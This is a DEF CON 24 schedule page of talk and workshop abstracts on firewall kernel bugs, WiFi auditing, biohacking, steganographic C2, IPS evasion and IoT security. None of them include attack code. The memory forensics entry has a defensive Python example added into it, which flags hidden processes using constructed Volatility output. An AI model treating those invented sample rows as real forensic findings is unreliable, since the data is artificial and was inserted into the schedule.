Security products should make our computers more secure, not less. Little Snitch is the de facto personal firewall for OS X that aims to secure a Mac by blocking unauthorized network traffic. Unfortunately bypassing this firewall's network monitoring mechanisms is trivial...and worse yet, the firewall's kernel core was found to contain an exploitable ring-0 heap-overflow. #fail Though briefly touching on generic firewall bypass techniques, this talk will largely focus on the kernel-mode vulnerability. Specifically, I’ll discuss bypassing OS X specific anti-debugging mechanisms employed by the product, reverse-engineering the firewall's I/O Kit kernel interfaces and 'authentication' mechanisms, and the discovery of the exploitable heap-overflow.
Finally, methods of exploitation will be briefly discussed, including how an Apple kernel fix made this previously un-exploitable bug exploitable on OS X 10.11.
So if you simply want to see yet another 'security' product fall, or more generically, learn methods of OS X kernel extension reversing in a practical manner, then this talk is for you :)
Patrick Wardle is the Director of Research at Synack, where he leads cyber R&D efforts. Having worked at NASA, the NSA, and Vulnerability Research Labs (VRL), he is intimately familiar with aliens, spies, and talking nerdy. Currently, Patrick’s focus is on automated vulnerability discovery, and the emerging threats of OS X and mobile malware. In his personal time, Patrick collects OS X malware and writes free OS X security tools. Both can be found on his website; www.Objective-See.com
Twitter: @patrickwardle
Return to Index
Wireless - Skyview 1 - Saturday - 17:00-17:50
Darren Kitchen
Bio
Darren Kitchen is the founder of Hak5, the award winning Internet television show inspiring hackers and enthusiasts since 2005. Breaking out of the 90s phone phreak scene, he has continued contributing to the hacker community as a speaker, instructor, author and developer of leading penetration testing tools.
@hak5darren
Sebastian Kinne
Bio
Sebastian Kinne has led software development at Hak5 since 2011. His background in embedded systems and reverse engineering has been instrumental in the success of the WiFi Pineapple, the popular WiFi auditing tool. As an instructor and speaker on WiFi security, chances are he's sniffed your packets in a demo or two.
@sebkinne
Imagine a Beowulf cluster of Pineapples!
Abstract
In Soviet Russia, WiFi Pineapples YOU! It has been a big year for the project with the introduction of the 6th generation WiFi Pineapples -- the NANO and TETRA. Join Darren Kitchen and Sebastian Kinne of Hak5 as they unveil the latest from their secret hacker lair-bunker-stronghold. Come witness the release of code name "BUFFALO BULLDOZER" and harness the power of your WiFi Pineapple arsenal.
Return to Index
BHV - Skyview 4 - Friday - 13:30-13:59
Speaker: c00p3r
About c00p3r:
c00p3r is the founder of dangerousminds.io, a biohacking, grinding, implantable tech, and network security podcast that started in late September 2016. He is a sysadmin who lives open source solutions by trade, and is also PR director and a member of the board of directors for Prophase Biostudios, located in Austin, Texas.
Abstract:
Through sharing experiences learned first hand and through work on the Dangerous Minds Podcast, c00p3r will be introducing you to implantable technology, explaining the basic products that are available on the market now, from where, as well as provide a show and tell experience of what it is like to become one of the augmentives. Come to learn, and stay to laugh and become a part of this new world of cyborgs.
Return to Index
BHV - Skyview 4 - Friday - 11:30-11:59
Speaker: Amal Graafstra
@amal
dangerousthings.com
About Amal:
Adventure technologist and biohacker Amal Graafstra has always been interested in technology. In 2005 he became the world’s first double RFID implantee. Amal had two small RFID transponders implanted, one into each hand, and he still uses them to open doors, start his vehicles, and log into his computer. Since implanting himself, he’s written a book called RFID Toys, become a TEDx speaker, appeared on a multitude of television programs, and been the subject of various documentaries. He's also started a biohacking company called Dangerous Things which developed the world’s first and only NFC compliant implantable transponder. He continues to explore biohacking and transhumanism while developing next generation implantable technologies.
Abstract:
Abstract pending.
Return to Index
BHV - Skyview 4 - Saturday - 11:30-11:59
Speaker: Amal Graafstra
@amal
dangerousthings.com
About Amal Graafstra:
Adventure technologist and biohacker Amal Graafstra has always been interested in technology. In 2005 he became the world’s first double RFID implantee. Amal had two small RFID transponders implanted, one into each hand, and he still uses them to open doors, start his vehicles, and log into his computer. Since implanting himself, he’s written a book called RFID Toys, become a TEDx speaker, appeared on a multitude of television programs, and been the subject of various documentaries. He's also started a biohacking company called Dangerous Things which developed the world’s first and only NFC compliant implantable transponder. He continues to explore biohacking and transhumanism while developing next generation implantable technologies.
Abstract:
Abstract pending.
Return to Index
BHV - Skyview 4 - Sunday - 11:30-11:59
Speaker: Amal Graafstra
@amal
dangerousthings.com
About Amal:
Adventure technologist and biohacker Amal Graafstra has always been interested in technology. In 2005 he became the world’s first double RFID implantee. Amal had two small RFID transponders implanted, one into each hand, and he still uses them to open doors, start his vehicles, and log into his computer. Since implanting himself, he’s written a book called RFID Toys, become a TEDx speaker, appeared on a multitude of television programs, and been the subject of various documentaries. He's also started a biohacking company called Dangerous Things which developed the world’s first and only NFC compliant implantable transponder. He continues to explore biohacking and transhumanism while developing next generation implantable technologies.
Abstract:
Abstract pending.
Return to Index
WOS - Skyview 6 - Sunday - 13:10-13:59
Incident Code Name: When SkyFalls A Shaken, Not Stirred, James Bond Tale on Incident Response
Plug, Security Operations and DFIR at Verizon Digital Media Services
The headlines shout the latest exploits of rogue actors and nation states. The hunters, cloaked in anonymity, strike without warning, devouring intellectual property and destroying corporate reputations. Potential victims cower in Fear, Uncertainty and Doubt, hoping they can hide in plain view. But can we learn from the hunters' strategies to mount an effective defense? In this talk we'll take a look at events that took place in the James Bond film Skyfall. We will look at the film from the Incident Response point of view, and analyze the events and actions that took place in the film with comparisons to real-life examples. Finally, we'll create a profile of the "evil" characters in the film along with James Bond and the team behind him at MI6. What team member would you be? Q, the weapons geek? Moneypenny, sidekick and junior field agent? M, the shrewd manager? Or James Bond, the tip of the spear, utilizing multiple strategies and tools to defeat his opponents?
Plug (Twitter: @plugxor) is currently a Senior Security Analyst at Verizon Digital Media Services (EdgeCast Networks). He started his journey in computer security back in 1996 when he discovered a 2600 magazine that eventually led him to his first LA2600 meeting in 1998. From that point forward he has been involved in computer security. With over 16 years of IT experience, he has worked as Systems Administrator, Security Analyst and Security Engineer in the Finance and Telecom sectors. In his free time he enjoys building Legos and playing with synthesizers and modular systems, and when possible he volunteers his time to computer security events.
Return to Index
CPV - Bronze 2 - Friday - 15:00-15:30
Talk Title:
Instegogram: Exploiting Instagram for C2 via Image Steganography
Speaker Name, Employer or position:
Amanda Rousseau, Hyrum Anderson, & Daniel Grant - R&D at Endgame
Abstract:
Exploiting social media sites for command-and-control (C2) has been growing in popularity in the past few years. But both good and bad guys have privacy concerns about their communication methods. Discoverable encryption may not always be the answer. By using image steganography we hide command-and-control messages in plain sight within digital images posted to the social media site Instagram. In this presentation, we will demo Instegogram as well as discuss how to detect and prevent it.
Bio:
Amanda absolutely loves malware. She works as a Malware Researcher at Endgame who focuses on dynamic behavior detection both on Windows and OSX platforms.
Hyrum Anderson is a data scientist at Endgame who researches problems in adversarial machine learning and deploys solutions for large scale malware classification. He received a PhD in signal processing and machine learning from the University of Washington.
Daniel Grant is a data scientist at Endgame focusing on behavioral analysis and anomaly detection. He received a MS in Operations Research from Georgia Tech and likes building things that find bad guys when they are being sneaky.
Social media links if provided:
@_Amanda_33, @drhyrum
Return to Index
Wireless - Skyview 1 - Saturday - 12:30-12:50
Caleb Mays
Bio
Caleb Mays is an academic researcher in wireless security with a focus on Insteon home automation networks and their enigmatic, proprietary protocol. He has been a network security professional for five years with experience in computer programming, enterprise network administration, and communications planning.
Ben Ramsey
Bio
Ben Ramsey, PhD, CISSP, has over a decade of experience in network security research. His work focuses on critical infrastructure protection and low power wireless protocols, such as ZigBee, Z-Wave, Bluetooth Low Energy, and Insteon. He has published in several academic journals and has presented research at multiple conferences, including GLOBECOM, MILCOM, SenseApp, and ShmooCon.
Insteon, Inste-off, Inste-open?
Abstract
Insteon home automation devices communicate via proprietary protocols riding over powerlines and sub-gigahertz RF. While Insteon has been making homes smarter for a decade, reverse engineering of the protocol by security professionals has only recently begun. At DEF CON 23 Peter Shipley reverse engineered much of the Insteon wireless protocol, demonstrated that Insteon's public whitepaper was largely bogus, and showed that there was no evidence of network security.
We agree with Joshua Wright that "Security does not improve until tools for practical exploration of the attack surface become available," so we set out to build such tools for Insteon. In this presentation we'll show how Shipley got it (mostly) right about the Insteon protocol, while also showing off significantly more advanced tools for sniffing and traffic injection. These tools include a powerful Wireshark dissector and a network scanner/enumerator.
Return to Index
IOT - Bronze 4 - Saturday - 15:30-16:10
Internet of Thieves (or DIY Persistence)
Joseph Needleman
Ever want your very own pwnlight, pwnpot, or pwntoaster?
Sure those are silly names, but in this world of embedded devices and development, let's try something different. We will be focusing on taking those fun, innocuous devices that are making people's lives smarter and turning them into our own useful embedded [attack] platforms. We will be covering what devices work best for different situations, when and where and what to embed, and provide ways of building out persistence directly on your new pwning platform.
Joe is a security researcher who loves to experiment with embedded devices, signals, and really anything with electrical signals. He lives in a server room and would love to be let out from time to time. When not stuck in a server room or being electrocuted he also dabbles with cloud research.
Return to Index
BHV - Skyview 4 - Saturday - 17:00-17:59
Speaker: NeuroTechX
@sciencelaer
@NeuroTechX
About Sydney Swaine-Simon:
Sydney Swaine-Simon was born and raised in Montreal, Canada. He has a strong passion for technology, innovation and the human mind, which led to him co-founding NeuroTechX, an NPO whose goal is to educate and grow the field of neurotechnology.
About Melanie Segado:
Melanie really likes brains and computers. This is why she co-founded NeuroTechX, an NPO whose mission is to grow the global neurotechnology community. She is currently pursuing a PhD in cognitive neuroscience. Melanie spends her free time hacking on brain technology and thinking about its societal implications.
Abstract:
Brain based authentication is an emerging field that seeks to use brain signals as a form of biometric authentication. Due to the increased availability and decreased cost of portable electroencephalography (EEG) devices, which can record brain activity from the scalp surface, this technique has gained popularity in research and in the media. In this talk we will explain the science underlying brain based authentication, the advantages and limitations of this technique, and give a live demo of a brain based authentication prototype.
Return to Index
Workshops - Las Vegas Ballroom 2 - Thursday - 10:00-14:00
Intro to Memory Forensics With Volatility
Miguel Antonio Guirao Aguilera Security Consultant, Futura - Open Solutions
Introduction to Memory Forensics with Volatility is a workshop for those who do not have a clue about forensics, memory forensics or the Volatility Framework. In order to get the most out of this workshop, you should feel comfortable using the command line interface (either Linux/Mac). In order to get a preview of the tool we will be using, visit http://www.volatilityfoundation.org/.
In this workshop, you will learn about memory forensics and how this is performed with one of the best open source frameworks for memory forensics, The Volatility Framework. You will learn how to analyze a memory image or dump, and look for artifacts that enable you, the forensics analyst, to rebuild the digital crime scene and to answer questions as to why, how and when.
You will learn to:
- Identify rogue processes in memory, maybe from malware or backdoors.
- Get details about these processes: when they were started, by whom, and additional info.
- Network connections: from where, at what time, what they launched, etc.
- Files opened: by which user, and how to link them with processes.
- Find out the command history, in either Linux or Windows.
- Check for signs of a rootkit.
- Analyze process DLLs and handles.
- Dump suspicious processes and drivers.
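The rootkit check in the list above is usually a cross-view comparison: a process that has been unlinked from the kernel's active process list (so pslist never walks to it) still has an _EPROCESS object in pool memory that psscan finds by signature. The following is an added example, not workshop code and not part of Volatility: it parses constructed excerpts laid out like Volatility 2's pslist and psscan output, reports processes seen only by the scanner, and adds a parent-process sanity check for well-known Windows processes whose parent is fixed by the boot chain. The expected-parent table and the sample rows are assumptions of the example.

```python
import re

# Constructed excerpts in the column layout of Volatility 2's pslist and psscan
# (Offset, Name, PID, PPID are the first four columns in both; the rest is ignored).
PSLIST = """\
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------
0xfffffa8000ca0b30 System                    4      0     84      507 ------      0 2016-08-04 10:00:01 UTC+0000
0xfffffa8001a5e040 smss.exe                248      4      2       29 ------      0 2016-08-04 10:00:02 UTC+0000
0xfffffa8001c0a060 wininit.exe             376    320      3       77      0      0 2016-08-04 10:00:05 UTC+0000
0xfffffa8001c63b30 services.exe            472    376      7      200      0      0 2016-08-04 10:00:06 UTC+0000
0xfffffa8001c6e5d0 lsass.exe               480    376      9      580      0      0 2016-08-04 10:00:06 UTC+0000
0xfffffa8002e3f060 explorer.exe           1204   1180     30      900      1      0 2016-08-04 10:01:10 UTC+0000
0xfffffa8002f91b30 svchost.exe            2222   1204      4       60      1      0 2016-08-04 10:07:42 UTC+0000
"""

PSSCAN = """\
Offset(P)          Name                PID   PPID PDB                Time created                   Time exited
------------------ ---------------- ------ ------ ------------------ ------------------------------ ------------------------------
0x000000003fca0b30 System                4      0 0x0000000000187000 2016-08-04 10:00:01 UTC+0000
0x000000003fa5e040 smss.exe            248      4 0x000000001a2b3000 2016-08-04 10:00:02 UTC+0000
0x000000003fc0a060 wininit.exe         376    320 0x000000001b4c5000 2016-08-04 10:00:05 UTC+0000
0x000000003fc63b30 services.exe        472    376 0x000000001c5d6000 2016-08-04 10:00:06 UTC+0000
0x000000003fc6e5d0 lsass.exe           480    376 0x000000001d6e7000 2016-08-04 10:00:06 UTC+0000
0x000000003fe3f060 explorer.exe       1204   1180 0x000000002e7f8000 2016-08-04 10:01:10 UTC+0000
0x000000003ff91b30 svchost.exe        2222   1204 0x000000002f809000 2016-08-04 10:07:42 UTC+0000
0x000000003fd11a40 rootkit.exe        1666    472 0x000000002a9b1000 2016-08-04 10:05:30 UTC+0000
"""

# Offset, name, pid, ppid; header and separator lines do not match and are skipped.
LINE = re.compile(r"^(0x[0-9a-fA-F]+)\s+(\S+)\s+(\d+)\s+(\d+)")

# Assumed boot-chain parents on Windows 7-era systems; extend per target OS.
EXPECTED_PARENT = {
    "smss.exe": "System",
    "services.exe": "wininit.exe",
    "lsass.exe": "wininit.exe",
    "svchost.exe": "services.exe",
}


def parse_processes(text):
    """Return {pid: (name, ppid)} from pslist/psscan-style output."""
    procs = {}
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            procs[int(m.group(3))] = (m.group(2), int(m.group(4)))
    return procs


def hidden_processes(pslist_text, psscan_text):
    """Cross-view check: processes the pool scanner finds that the linked list does not."""
    listed = parse_processes(pslist_text)
    scanned = parse_processes(psscan_text)
    return sorted((pid, name) for pid, (name, _) in scanned.items() if pid not in listed)


def parent_anomalies(pslist_text, expected=EXPECTED_PARENT):
    """Flag well-known processes whose parent is not the one the boot chain gives them."""
    procs = parse_processes(pslist_text)
    names = {pid: name for pid, (name, _) in procs.items()}
    bad = []
    for pid, (name, ppid) in procs.items():
        want = expected.get(name)
        if want and names.get(ppid) != want:
            bad.append((pid, name, names.get(ppid, "?")))
    return sorted(bad)


if __name__ == "__main__":
    print("psscan-only:", hidden_processes(PSLIST, PSSCAN))
    print("odd parents:", parent_anomalies(PSLIST))
```

Two caveats a practitioner would apply before calling pid 1666 hidden: psscan also surfaces terminated processes whose pool objects have not been reused, so the Time exited column has to be empty for the finding to mean unlinking; and the parent check only catches the obvious cases (here an svchost.exe spawned by explorer.exe), since a real process-hollowing or injection case keeps the legitimate parent and needs the DLL/handle and malfind-style checks from later in the list.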
Miguel Guirao (aka Chicolinux) has been in the information security industry for around ten years. He is a freelance consultant at Futura - Open Solutions, where he has also been training professionals in Linux management, information security and programming. He has also been a professor since 2009 at Anahuac Mayab University, where he teaches at the School of CS Engineering and at the School of Multimedia Design. He teaches Information Security in the Master of Information Technology Management.
Max Class Size: 55
Prerequisites for students: Students must feel comfortable using the CLI (Command Line Interface). Knowledge of the basic commands in Linux, like ls, cd, relative & absolute path, ps, and so on.
Materials or Equipment students will need to bring to participate: Although the Volatility tool is also available for Windows, in order to get its full power we will be using GNU/Linux/UNIX, so either install it on your laptop or create a VM with your favorite virtualization software. Volatility requires Python, so in order to save time and get into what really matters, come with your OS fully loaded with the tool and all its prerequisites. More info at http://www.volatilityfoundation.org/
Return to Index
CPV - Bronze 2 - Friday - 15:30-16:00
Talk Title:
Introducing Man In The Contacts attack to trick encrypted messaging apps
Speaker Name, Employer or position:
Jérémy Matos - Software Security Expert at SecuringApps
Abstract:
Mobile messaging applications have recently switched to end-to-end encryption. With debates at the government level asking for backdoors, those tools are perceived as unbreakable. Yet most of the implementations trust the contact information stored in the smartphone. Given that end users hardly know more than a few phone numbers, and that modifying contacts is easy, we will introduce a new type of attack: Man In The Contacts (MITC). Without studying any cryptography, we will examine how WhatsApp, Telegram and Signal behave when an Android application tampers with the contacts in the background. In some scenarios the end user can be fooled into talking to the wrong person, and a MITM proxy can be implemented. Finally, we will discuss countermeasures at both the technical and the usability level.
Bio:
Jeremy Matos has been working in building secure software over the last 10 years. With an initial academic background as a developer, he was involved in designing and implementing a two-factor authentication product with challenging threat models, particularly when delivering a public mobile application. As a consultant he helped in the security requirements definition and implementation, including cryptographic protocols, for applications where the insider is the enemy. He also led code reviews and security validation activities for companies exposed to reputation damage. In addition, he participated in research projects to mitigate Man-In-The-Browser and Man-In-The-Mobile attacks.
Social media links if provided:
@SecuringApps
Return to Index
Wireless - Skyview 1 - Friday - 13:00-13:50
Brian Butterly
Bio
Brian is a security researcher, analyst and simply a hacker at Heidelberg (Germany) based ERNW GmbH. Coming from the field of electronic engineering he tends to choose alternate approaches when hitting new projects. He currently works on the intersection of embedded-, mobile and telco-security, with tasks and research ranging from evaluating apps and devices through to analyzing their transport networks and backend infrastructures. Resulting from the broad range of practical experience and natural curiosity he has developed a very diverse set of skills and knowledge. He enjoys cracking open black boxes and learning about their details down to the electronic circuits and creating the tools he needs on the way. He is always happy to share his knowledge and findings.
@BadgeWizard
Stefan Kiese
Bio
Stefan works as a security researcher and analyst at ERNW and has extensive experience in hardware security. Through his former work he has background in SCADA and R&D of embedded systems. His personal main areas of interest are embedded systems, the IoT and of course their security issues.
Introducing the HackMeRF
Abstract
During the past few years the IM-ME has gained quite some interest throughout the hacker community. Initially designed and sold as a hardware chat toy/client for girls, it consists of a simple display, a QWERTY keyboard and a sub-GHz RF-enabled TI SoC (CC1110) with an 8051 core. As the controller turned out to be re-programmable, various RF tools such as spectrum analyzers and garage door bruteforcers have been implemented on just this platform. Sadly the device is becoming very rare, is slow and lacks memory for larger projects.
In preparation for our home conference we decided to pay tribute to the IM-ME by re-animating it as a conference badge based on TI's CC1310. Using the ARM Cortex-M3 based SoC and a touch display we've created a sound successor: the HackMeRF.
In our talk we will introduce the HackMeRF as an open hardware and open source platform for RF hackers, researchers and developers. It will start with an overview of the IM-ME, as our inspiration, and of further RF projects that are currently available. Then, after covering the HackMeRF's development process and challenges, we will give a detailed insight into its components and hardware design. We will then present our current code base and show a few quick examples of how to implement protocols and get the device to talk. And, of course, we will show the actual device and present our current hardware design.
As we want to make the HackMeRF available to everybody, we'd love to collect some feedback, ideas and further inspiration from the audience!
-----------------------------
Some further technical information on the device can be found here: https://www.insinuator.net/2016/03/troopers-16-taking-the-badge-to-yet-another-level/
Our website is sadly not quite finished yet.
Return to Index
DEFCON - Track Three - Friday - 10:00-10:59
Introducing the Witchcraft Compiler Collection: Towards Universal Code Theft
Jonathan Brossard (endrazine) Master of Darkness, MOABI.com
With this presentation, we take a new approach to reverse engineering. Instead of attempting to decompile code, we seek to undo the work of the linker and produce relocatable files, the typical output of a compiler. The main benefit of the latter technique over the former is that it does work. Having achieved universal code 'reuse' by relinking those relocatable objects as arbitrary shared libraries, we'll create a form of binary reflection, add scripting capabilities and in-memory debugging using a JIT compiler, to attain automated API prototyping and annotation, which, we will argue, constitutes a primary form of binary code self-awareness. Finally, we'll see how abusing the dynamic linker internals elegantly solves a number of complex tasks for us, such as calling a given function within a binary without having to craft a valid input to reach it.
The applications in terms of vulnerability exploitation, functional testing, static analysis validation and more generally computer wizardry being tremendous, we'll have fun demoing some new exploits in real-life applications, and commit public program profanity, such as turning PEs into ELFs, functional scripting of sshd in memory, and stealing crypto routines without even disassembling them, among other things that were never supposed to work. All the above techniques have been implemented in the Witchcraft Compiler Collection, to be released as proper open source software (MIT/BSD-2 licenses) exclusively at DEF CON 24.
Jonathan Brossard is a computer whisperer from France, although he's been living in Brazil, India, Australia and now lives in San Francisco. For his first conference at DEF CON 16, he hacked Microsoft BitLocker, McAfee Endpoint and a fair number of BIOS firmwares. During his second presentation at DEF CON 20, he presented Rakshasa, a BIOS malware based on open source software, which the MIT Technology Review labeled “incurable and undetectable”.
This year will be his third DEF CON ... Endrazine is also known in the community for having run the Hackito Ergo Sum and NoSuchCon conferences in France, participating in the Shakacon Program Committee in Hawaii, and authoring a number of exploits over the past decade, including the first remote Windows 10 exploit and several hardcore reverse engineering tools and whitepapers. Jonathan is part of the team behind MOABI.COM, and acts as the Principal Engineer of Product Security at Salesforce.
Twitter: @endrazine
Facebook: toucansystem
https://moabi.com
Return to Index
Workshops - Las Vegas Ballroom 6 - Friday - 10:00-14:00
Introduction to Penetration Testing with Metasploit
Georgia Weidman CEO & Founder, Shevirah
This class will be conducted using Kali Linux against Windows and Linux target virtual machines. Students will become familiar with the phases of the Penetration Testing Execution Standard (PTES) and the common tools of the trade such as Metasploit, Nmap, Nessus, Maltego and others. Beginning with using Kali Linux and the Metasploit Framework, this course will then simulate each phase of penetration testing with the target virtual machines. Students will learn how to gather information about a target organization using open source reconnaissance, discover and verify vulnerabilities on targets, and use tools, public exploits, and manual techniques to exploit issues. In post-exploitation we will gather information, pivot onto additional networks, perform privilege escalation, etc. Due to the short time, this course is a great kick-starter into completing additional material on penetration testing, including an additional penetration testing target from the instructor's book and an online lab of additional targets of varying difficulty which will be made available to students at the end of the course.
Shevirah founder and CEO Georgia Weidman is a serial entrepreneur, penetration tester, security researcher, speaker, trainer, and author. She holds an MS in computer science as well as holding CISSP, CEH, and OSCP certifications. Her work in the field of smartphone exploitation has been featured internationally in print and on television. She has spoken on her research at venues such as the NSA, West Point, and top security conferences. She has provided technical training such as exploit development and penetration testing at conferences such as Black Hat USA, BruCON, and CanSecWest. Georgia founded Bulb Security LLC, a security consulting firm specializing in security assessments/penetration testing, security training, and research/development. She was awarded a DARPA Cyber Fast Track grant to continue her work in mobile device security, culminating in the release of the open source project the Smartphone Pentest Framework (SPF). She founded Shevirah Inc. to create product solutions for assessing and managing the risk of mobile devices in the enterprise and testing the effectiveness of enterprise mobility management solutions, and is a graduate of the Mach37 cybersecurity accelerator. She is the author of Penetration Testing: A Hands-On Introduction to Hacking from No Starch Press, “On edge graceful labelings of disjoint unions of 2r-regular edge graceful graphs” in the Journal of the Institute of Combinatorics and its Applications, and the principal investigator on pending patent "METHOD AND SYSTEM FOR ASSESSING DATA SECURITY". She was the recipient of the 2015 Women’s Society of CyberJutsu Pentest Ninja award. She is on the board of advisors of the angel-backed security training startup Cybrary and the nonprofit Digital Citizens Alliance.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate:
If students wish to follow along hands-on, the materials to be downloaded will be made available online a week before the course. Since this is first come, first served, people who do not make it into the workshop may of course download the materials and work through my book with them if they so choose. Additional targets and exercises will be available for after class, so even those who prefer to watch and listen during class are encouraged to download the materials for practice later.
Return to Index
Workshops - Las Vegas Ballroom 5 - Friday - 10:00-14:00
Introduction to x86 disassembly
Dazzle Cat Duo Security Engineers
Jumping into the world of disassembly can be incredibly intimidating and quite painful. This talk aims to introduce disassembly by walking through how to recognize basic logic flows and data structures in assembly. We’ll look at locating common flow controllers such as if/else/loops/switch cases, as well as memory access and data structures. The talk will specifically address static disassembly using IDA, looking at C compiled to x86_32, but the principles can be applied to any other language and assembly architecture. x86 is one of the most common assembly architectures, and incredibly useful for security engineers to understand. x86 is the assembly architecture running almost all Mac, Windows, and Linux computers.
The Dazzle Cat Duo are both security engineers who specialize in x86. In addition, both serve as adjunct faculty members where they teach C and x86.
Max Class Size: 55
Prerequisites for students: Students must have a basic coding knowledge, and understand what if/else/loops/switches logically do, in any coding language.
Materials or Equipment students will need to bring to participate: Please bring a laptop with VirtualBox (latest version) and at least 20 GB of free disk space. VMs with examples and tools will be distributed in class via USB sticks.
Return to Index
Workshops - Las Vegas Ballroom 6 - Thursday - 15:00-19:00
Intrusion Prevention System (IPS) Evasion Techniques
Thomas Wilhelm
John Spearing Co-founder and Operations Manager, Crystal Defense Network Information Security
In most professional penetration tests, the pentester is given unrestricted, unfettered access to a network. However, this does not provide an effective evaluation of all preventative measures available to an organization that prevent and identify ongoing attacks. As a result, more businesses now require pentesters to confront Intrusion Detection / Prevention Systems aimed at limiting attacks in their network. The ability to understand how IDS/IPS systems work and effective techniques to circumvent their efforts to restrict your activities within the network is becoming essential for pentesters.
In this workshop, we will build an IPS and examine its inherent limitations. We will then perform attacks within a test lab environment to see how effective the IPS is against our typical attacks. Once we understand how IPS systems limit our ability to pentest, we will then look at ways to exploit IPS limitations to be more effective in our professional penetration tests.
Thomas Wilhelm has been an associate professor at an NSA CAE university, where he has taught information assurance for many years at both the master's and undergraduate level. He has been a penetration tester and team lead for Fortune 100 companies, and has spent the last 20+ years involved in information security.
Thomas has written and authored numerous articles and books over the years on hacking; the latest is titled “Professional Penetration Testing (vol 2),” published by Syngress, which has been printed in multiple languages. Thomas holds two master's degrees (MSCS, MSM) and maintains the following certifications: ISSMP, CISSP, CCNP Security, SCSECA, SCNA, SCSA, IEM, IAM.
John Spearing works in the field of network and physical security, and has obtained master's degrees in both Computer Science and Organizational Behavior. John is the co-founder and Operations Manager of the MSSP company known as Crystal Defense Network Information Security, located in central Colorado. John's specialty within the Information Security realm is centered on network intrusion detection and prevention, as well as endpoint security.
Max Class Size: 55
Prerequisites for students: Students should already be familiar with penetration testing techniques and tools (and their flags). The use of proxies will be required to participate, so knowledge of how to configure your hacking platform to intercept and ability to modify packets is essential.
Materials or Equipment students will need to bring to participate: Since this is an advanced penetration testing subject, participants should have a laptop with the ability to host virtual images, which also contains an up to date Kali Linux image. In addition, if they want to participate in actual attacks within the lab, they should bring CAT5 cables for connectivity. This class will not spend time getting students online - participants should already be familiar with configuring static IP addresses and/or DHCP for their systems. Because participants will be able to connect to a lab environment with active exploits, it is suggested that students use a computer system that can be easily re-imaged at the end of the workshop.
Return to Index
IOT - Bronze 1 - Sunday - 11:00-11:50
IoT Defenses - Software, Hardware, Wireless and Cloud
Aaron Guzman, Principal Penetration Tester
The vast playground of IoT, and all its problems, will surely transfer from consumer homes over to the enterprise. Various studies have shown the effect of consumer IoT adoption in the enterprise, resulting in rogue connections into a trusted network. Items such as smart TVs, drones, home security devices, and even connected vehicles are now being discovered in corporate networks. Industry professionals and board rooms are struggling to keep up with the growth of IoT due to the various interfaces introduced. We will discuss the many IoT attack surfaces and provide proactive security controls that are easily implemented by consumers, enterprises, and manufacturers alike.
What is constantly being shared throughout the industry is how IoT is broken, vulnerable, and insecure. Various testing methodologies and guidance cheat sheets have been released without discussions on how to protect against the threats discovered. Drawing on the speaker's work as a technical editor for an upcoming IoT security book, as well as a contributor to various security guidance documents on IoT, this talk will give practical defense guidance that attendees and manufacturers can implement.
Aaron is a Principal Penetration Tester in the Los Angeles area with expertise in Application Security, IoT, Mobile, Web, and Network Penetration testing. He volunteers his time as a Chapter Board Member for OWASP Los Angeles, President for Cloud Security Alliance SoCal, and a Technical Editor for Packt Publishing. Aaron is a contributor to various IoT guidance documents from CSA, OWASP, Prpl, and others. He has held roles with companies such as Belkin, Linksys, Dell and Symantec.
Social media links if provided:
@scriptingxss
Return to Index
BHV - Skyview 4 - Saturday - 13:30-13:59
Speaker: RenderMan
About RenderMan:
Canadian born and raised. He hacks banks during the day and other random things at night (currently sex toys). His interests are very diverse and people seem to like to hear about his work as much as he enjoys sharing it. This has allowed him to speak at conferences and events all over the world and even change it a few times.
Often near infosec news or causing it himself, he can be found on Twitter at @ihackedwhat and @internetofdongs
Abstract:
Among ‘Internet of Things’ security research, there is one branch that no one has wanted to touch, until now: the Internet of Dongs. Internet-connected sex toys in all shapes, sizes and capabilities are available on the market, with many more being developed. Like many IoT devices, IoD devices suffer a great many security and privacy vulnerabilities. These issues are all the more important when you consider the private and intimate nature of these devices. To research this, the Internet of Dongs project was founded (https://internetofdon.gs).
This talk will explore this under-researched branch of IoT and the security and privacy threats that exist. It will also cover the IoD project's efforts to bring information security best practices to the adult toy industry.
Return to Index
IOT - Bronze 1 - Friday - 16:00-16:50
Is Your Internet Light On? Protecting Consumers in the Age of Connected Everything
Terrell McSweeny, Federal Trade Commission, Commissioner
Learn about the FTC's efforts to push for improvements in IoT security, including our law enforcement actions challenging inadequate data security in devices like webcams and routers, upcoming workshops on emerging technology issues including drones and smart TVs, our Start with Security business education initiative, and the expansion of the agency's in-house research and investigation capabilities. In January 2015 the FTC issued a report on the IoT, finding a troubling lack of security in many IoT products. We'll provide an update on the agency's activities and policy work since then, tips for how to bring issues to the FTC's attention, and a review of some of the challenges that remain.
Terrell McSweeny is a Commissioner of the Federal Trade Commission and this is her third time at DEF CON. When it comes to tech issues, Commissioner McSweeny has focused on the valuable role researchers and hackers can play in protecting consumer data security and privacy. She opposes bad policy and legislative proposals like mandatory backdoors and the criminalization of hacking. She believes that enforcers like the FTC should work with the researcher community to protect consumers.
Joe Calandrino, PhD is the Research Director of the Federal Trade Commission's Office of Technology Research and Investigation. With a PhD in computer science focused on security and privacy from Princeton, Dr. Calandrino is personally motivated to see the work and views of the security community drive educated government action and policy. From personal experience uncovering vulnerabilities in voting machine source code, contributing to the cold-boot attack on disk encryption (for which he won a prestigious Pwnie Award!), or revealing ways that recommendations can leak information, he has seen how security research can teach valuable lessons and make us safer. His goals at the FTC include continuing to build both its internal technical expertise and its bonds with the larger security community.
@TMcSweenyFTC
Return to Index
Wireless - Skyview 1 - Saturday - 14:30-14:50
abraxas3d
Bio
I enjoy thinking and doing. Not necessarily in that order. Book learning: BSEET, BSCET, MSEE, math minor. Actual doing: Engineer, Extra Class Ham, Radio Club Trustee, Phase 4 Ground Lead, Organ Donor (AI Pipe Organ) Lead, Sol Diego (Burning Man) Director, San Diego CORE Critter Lead, DEFCON 2, 4, 7, 11, 13, 17, 18, 21, 22, 23.
@abraxas3d
Skunkworks
Bio
"Starting with an amateur radio license in 1977 and a B.S.E.E. from Rice University in 1983.5, Paul relocated to San Diego to join Linkabit, and eventually Qualcomm, where he participated in early hardware, software, and standards development for CDMA cellular systems. He's been active with amateur satellites since the telemetry was sent in Morse code, and helped build the first batch of microsats with digital payloads. He'd like to help drag amateur satellites into the new millennium."
@mustbeart
It's Just Software, right?
Abstract
